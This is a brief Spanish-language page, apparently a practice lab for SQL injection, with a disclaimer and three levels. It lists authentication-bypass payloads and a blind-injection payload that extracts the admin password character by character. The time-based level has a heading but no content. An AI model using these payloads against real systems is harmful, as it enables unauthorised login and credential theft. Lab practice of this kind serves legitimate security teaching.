Este contenido tiene fines exclusivamente educativos. Los archivos no se almacenan en servidores propios. Todo el contenido enlazado ha sido revisado con VirusTotal. Términos y Condiciones.

Laboratorio de SQL Injection

Objetivo

Practicar técnicas de inyección SQL en un entorno controlado.

Nivel 1 — SQLi básico

' OR 1=1 --
admin' --

Nivel 2 — SQLi ciego

' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin') = 'a' --

Nivel 3 — Basado en tiempo

Herramientas

  • Burp Suite
  • SQLMap
  • Python